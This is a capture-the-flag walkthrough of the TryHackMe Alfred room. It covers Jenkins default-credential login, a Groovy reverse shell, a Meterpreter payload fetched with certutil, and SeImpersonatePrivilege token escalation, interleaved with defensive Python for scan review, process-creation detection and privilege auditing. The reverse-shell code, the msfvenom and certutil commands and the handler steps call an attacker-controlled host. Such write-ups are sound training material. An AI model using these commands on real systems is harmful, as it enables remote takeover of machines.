Alfred Can't Stop this SeImpersonatePrivilege Vulnerability

This walkthrough covers the Alfred room on TryHackMe. The objective is to exploit a misconfigured Jenkins server, obtain a reverse shell, and escalate privileges by abusing the SeImpersonatePrivilege held by a low-privileged user to reach NT AUTHORITY\SYSTEM.

Step 1: Nmap

nmap -sC -sV -O -p- -Pn alfred.thm --min-rate=1000
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -O -p- -Pn alfred.thm --min-rate=1000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 17:33 MDT
Nmap scan report for alfred.thm (10.10.70.88)
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  tcpwrapped
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows Server 2008 R2 SP1 (87%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.82 seconds

From this scan, we identified three open ports: 80, 3389, and 8080.
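To turn a scan like this into something reviewable, the following added Python example (mine, not part of the original post or of nmap) parses the normal-format port lines into records and runs a simple exposure policy over them. The scan excerpt is embedded inline so it runs offline; the policy itself (RDP should not be reachable, a Jetty-fronted service is likely Jenkins and needs its authentication checked) is an assumption for illustration.

```python
import re

# Constructed excerpt of the nmap normal-format output from the scan above;
# pasted here as inline data so the parser runs offline.
NMAP_OUTPUT = """\
Nmap scan report for alfred.thm (10.10.70.88)
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
3389/tcp open  tcpwrapped
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+) \(([\d.]+)\)")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Review policy (an assumption for this example): services that should not be
# reachable from an untrusted network, keyed by port or by a version-string pattern.
PORT_POLICY = {3389: "Remote Desktop exposed; restrict to VPN or a jump host"}
VERSION_POLICY = [
    (re.compile(r"jetty", re.I),
     "Jetty is the servlet container Jenkins ships with; confirm authentication is "
     "enforced and the Script Console is limited to administrators"),
]

def parse_nmap(text):
    """Return {'host', 'ip', 'ports': [...]} from nmap normal output."""
    result = {"host": None, "ip": None, "ports": []}
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            result["host"], result["ip"] = m.group(1), m.group(2)
            continue
        m = PORT_LINE.match(line)
        if m:
            result["ports"].append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),   # empty for lines like '3389/tcp open tcpwrapped'
            })
    return result

def exposure_review(scan):
    """Return [(port, reason)] for open ports that violate the policy above."""
    findings = []
    for p in scan["ports"]:
        if p["state"] != "open":
            continue
        if p["port"] in PORT_POLICY:
            findings.append((p["port"], PORT_POLICY[p["port"]]))
        for pattern, reason in VERSION_POLICY:
            if pattern.search(p["version"]):
                findings.append((p["port"], reason))
    return findings

if __name__ == "__main__":
    scan = parse_nmap(NMAP_OUTPUT)
    print(f"{scan['host']} ({scan['ip']}): {len(scan['ports'])} open ports")
    for port, reason in exposure_review(scan):
        print(f"  port {port}: {reason}")
```

Against the scan above this reports 3389 and 8080; port 80 passes because nothing in the policy objects to IIS itself. The version-string rule is the useful one here: the port number alone says nothing, but "Jetty 9.4.z-SNAPSHOT" on a Windows host is a strong hint that a CI server is listening.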

Port 80:

Port 8080:

Step 2: Logging In

Trying some default login credentials, we discover that admin:admin works.

Step 3: Initial Foothold

Poking around the Jenkins instance, we find the Script Console, where we can run Groovy scripts. This will be our way into the box.

We're using a Groovy reverse shell from PayloadsAllTheThings.

String host="10.0.0.1";   // attacker IP (placeholder value from PayloadsAllTheThings)
int port=4242;            // attacker listening port
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  // pump process output to the socket and socket input to the process
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}   // exit the loop once cmd.exe has ended
}
p.destroy();s.close();

Running this script in the built-in Script Console connects back to our attack box and drops us into a shell.

From here we find our user.txt flag in C:\Users\bruce\Desktop\.

Step 4: Upgrade to Meterpreter Shell

First, we want to generate our payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.28.215 LPORT=1335 --format exe -o payload.exe

From the victim, we're going to use certutil to download it.

certutil.exe -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe

Now we fire up msfconsole and set up our handler to catch the shell.

  1. use exploit/multi/handler

  2. set payload windows/meterpreter/reverse_tcp

  3. set LHOST <ATTACKER_IP>

  4. set LPORT 1335

  5. exploit

Once the payload.exe is run on the victim machine, our handler will catch the shell and drop us in.
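Seen from the host's side, Steps 3 and 4 leave a distinctive process tree: the Jenkins java.exe spawning cmd.exe, certutil fetching a file over HTTP, and a new executable running out of the Jenkins directory. The added Python example below (mine, not from the post, TryHackMe or Metasploit) runs three detection rules over constructed process-creation events in the shape of Sysmon Event ID 1 / Security 4688 fields. The install path, the host name ALFRED and the account names are assumptions; the certutil command line and payload.exe are taken from the walkthrough.

```python
import ntpath
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 and Security 4688 share)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str

# Constructed sample events. Paths, the host name ALFRED and the accounts are assumptions;
# the certutil command line and the payload name are from the walkthrough.
SAMPLE_EVENTS = [
    # Jenkins (java.exe) spawning cmd.exe: what the Groovy reverse shell looks like on the host
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
                 "cmd.exe", r"ALFRED\bruce"),
    # certutil used as a downloader from that shell
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "certutil.exe -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe",
                 r"ALFRED\bruce"),
    # the downloaded binary executed from the Jenkins install directory
    ProcessEvent(r"C:\Program Files (x86)\Jenkins\payload.exe",
                 r"C:\Windows\System32\cmd.exe", "payload.exe", r"ALFRED\bruce"),
    # benign: an administrator's interactive shell and a hash check
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
                 "cmd.exe", r"ALFRED\admin"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
                 "certutil -hashfile installer.msi SHA256", r"ALFRED\admin"),
]

SHELLS = {"cmd.exe", "powershell.exe"}
CI_DIR = r"c:\program files (x86)\jenkins"   # assumed install path, compared case-insensitively
CI_ALLOWED = {"java.exe", "jenkins.exe"}     # binaries expected to run from CI_DIR

def base(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()

def detect(events):
    """Return [(rule, image, command_line)] for every event that matches a rule."""
    alerts = []
    for e in events:
        image, parent, cmd = base(e.image), base(e.parent_image), e.command_line.lower()
        # 1. CI server process launching a shell. Batch build steps do this legitimately,
        #    so treat it as a lead to correlate with outbound connections, not a verdict.
        if image in SHELLS and parent == "java.exe":
            alerts.append(("ci_spawned_shell", e.image, e.command_line))
        # 2. certutil fetching over HTTP: the living-off-the-land download step above.
        if image == "certutil.exe" and "urlcache" in cmd and "http" in cmd:
            alerts.append(("certutil_download", e.image, e.command_line))
        # 3. An unexpected executable running out of the CI install directory.
        if e.image.lower().startswith(CI_DIR) and image not in CI_ALLOWED:
            alerts.append(("exec_from_ci_dir", e.image, e.command_line))
    return alerts

if __name__ == "__main__":
    for rule, image, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {image} :: {cmd}")
```

Rule 1 on its own is noisy on a real build server, which is why the three fire as a sequence under the same account here; in practice you would join them on user and time window (and on a Sysmon network-connection event for the cmd.exe child) before paging anyone.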

Step 5: Privesc

Let's see what privileges we have currently by typing whoami /priv.

Nice. We have SeImpersonatePrivilege; let's exploit it. We can do this with the incognito module built into Metasploit.
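The same whoami /priv output is what a defender should be reviewing for every service account before an attacker does. As an added example (mine, not from the post or from TryHackMe), the Python below parses the command's text format and flags the privileges that let a process escalate on its own; the sample output is constructed to resemble a low-privileged service account and is not the room's real output.

```python
import re

# Constructed sample of `whoami /priv` output for a low-privileged service account.
# The privilege set is illustrative, not the room's actual output.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a process holding them reach SYSTEM or equivalent without a further bug.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege",
}

# name, free-text description, then the State column
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Map privilege name -> 'Enabled'/'Disabled' from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line)
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def audit(privs):
    """Return [(name, state)] for held high-risk privileges, enabled or not.

    'Disabled' only means the privilege is not switched on in the current token;
    any process of this account can enable it, so it is still a finding.
    """
    return sorted((n, s) for n, s in privs.items() if n in HIGH_RISK)

if __name__ == "__main__":
    for name, state in audit(parse_privileges(WHOAMI_PRIV)):
        print(f"FINDING: {name} ({state})")
```

The mitigation is an account decision rather than a patch: "Impersonate a client after authentication" is granted by default to Administrators, LOCAL SERVICE, NETWORK SERVICE and SERVICE, so a CI server running under one of those, or under an account that was handed the right in User Rights Assignment, gives any foothold a straight path to SYSTEM. Running Jenkins as a dedicated account without that right removes the step this room is built around.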

Next, we want to impersonate the Administrator's token. We can do this by typing the following command: impersonate_token "BUILTIN\Administrators".

Now let's migrate to a process with the right permissions. The safest bet is always services.exe.

  1. View processes: ps

  2. Find the PID of services.exe

  3. migrate <PID>

Now that we're successfully NT AUTHORITY\SYSTEM, let's find our root flag and complete this room.

This room was a great introduction to AD pentesting. After going through this, I realized I have a long way ahead of me until I feel comfortable enough to sit down for the PNPT certification by TCM Security. I hope you enjoyed this walkthrough of the Alfred room found on TryHackMe, and as always, Happy Hacking.

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!